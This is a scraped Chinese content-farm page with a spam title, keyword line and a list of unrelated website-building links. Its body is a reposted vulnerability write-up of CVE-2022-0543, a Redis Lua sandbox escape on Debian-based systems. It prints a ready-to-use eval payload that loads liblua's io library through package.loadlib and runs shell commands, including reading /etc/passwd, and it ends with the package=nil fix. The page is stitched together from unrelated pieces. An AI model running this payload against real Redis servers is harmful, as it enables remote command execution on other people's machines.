当前位置: 首页 > news >正文

广州建设专业网站网站开发的前端和后端有哪些框架

广州建设专业网站,网站开发的前端和后端有哪些框架,泰和网站建设,企业网站产品优化怎么做CVE-2022-0543 | redis的远程代码执行漏洞 简介 CVE-2022-0543 该 Redis 沙盒逃逸漏洞影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞, 漏洞形成原因在于系统补丁加载了一些redis源码注释了的代码 原理分析 redis一直有一个攻击面,就是在用户连接redis后,可以通过ev…CVE-2022-0543 | redis的远程代码执行漏洞 简介 CVE-2022-0543 该 Redis 沙盒逃逸漏洞影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞, 漏洞形成原因在于系统补丁加载了一些redis源码注释了的代码 原理分析 redis一直有一个攻击面,就是在用户连接redis后,可以通过eval命令执行lua脚本.但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件 所以这个CVE本质是一个沙箱绕过漏洞 Ubuntu/Debian/CentOS等这些发行版本会在原始软件的基础上打一些补丁包给Redis打了一个的补丁,增加了一个include, 下面是Debian通过shell使用make生成补丁包的源码 : debian/lua_libs_debian.c:echo // Automatically generated; do not edit. $echo luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package); $set -e; for X in $(LUA_LIBS_DEBIAN_NAMES); do \echo if (luaL_dostring(lua, \$$X require($$X);\)) $; \echo serverLog(LL_NOTICE, \Error loading $$X library\); $; \doneecho luaL_dostring(lua, module nil; require nil;); $luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package)就是漏洞的来源,。 这段代码原本在redis源码里已经是被注释了的, 将其注释掉的原因就是“for sandboxing concerns” Debian的这个补丁却把这句话重新写进去了, 导致在 Lua 沙箱中遗留了一个对象package攻击者可以利用这个package对象提供的方法加载动态链接库 liblua 里的函数进而逃逸沙箱执行任意命令 借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数即可获得io库再使用其执行命令。 需要注意的一点是 : 不同系统下liblua5.1.so.0的路径可能不同 我们可以利用这个模块来加载任意Lua库最终逃逸沙箱执行任意命令 local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return resPayload: (执行命令id可以改变) eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0 一、环境启动 二、直接通过redis-cli -h 127.0.0.1 -p 6379 进入redis里面进行测试 可见执行了tac /etc/passwd命令 三、漏洞修复建议 Lua 初始化的末尾添加packagenil 。
http://www.hkea.cn/news/14438596/

相关文章:

  • 网站开发广告宣传语公司注册查询是在哪查
  • 司法局网站体制机制建设情况郑州知名网站建设服务公司
  • 网页设计与网站开发农村网站平台建设方案
  • 重庆本地网站有哪些wordpress dns ip
  • 建网站的公司首选智投未来企业官网模版制作
  • 祖传做网站品牌型网站制作价格
  • 网站建设与制作实训报告事件营销成功案例
  • 网站备案换接入商郑州市科协网站
  • 四川智能网站建设制作网站建设教程asp
  • 网站建设是怎么收费的网站建设选哪个
  • 新站整站排名优化火速公司做ppt素材网站哪个好
  • 怎么做网站外链沁阳网站建设
  • 建设网站需要哪个语言编译器单招网是哪个网站制作公司做的
  • c2c网站建设费用采购销售管理软件
  • 分析公司网站的开发策略免费打广告的平台app
  • 视频网站cms系统app制作公司排行榜
  • 花生壳盒子可以做网站服务器八八网络科技有限公司
  • 阿里巴巴国际网站首页视频怎么做济南优化联系电话
  • 广州网站运营专业乐云seo网页制作怎么把图片放进去
  • 网站设计的主题医院网站建设 中企动力
  • 收费小说网站怎么做wordpress占内存
  • 网站建设与维护试卷 一flow创意博客wordpress主题
  • 天津企业网站开发南宁整合推广公司
  • 做pc端网站服务windows搭建网站
  • 网站设计模板免费下载商业网站开发教程
  • 免费网站如何注册网页制作教程入门讲解
  • 简洁个人博客网站模板泉州网站建设服务
  • 架设网站开发环境提供网站建设公司
  • 淄博网站建设-中国互联中山免备案网站建设
  • 怎么制作网站后台空间 两个网站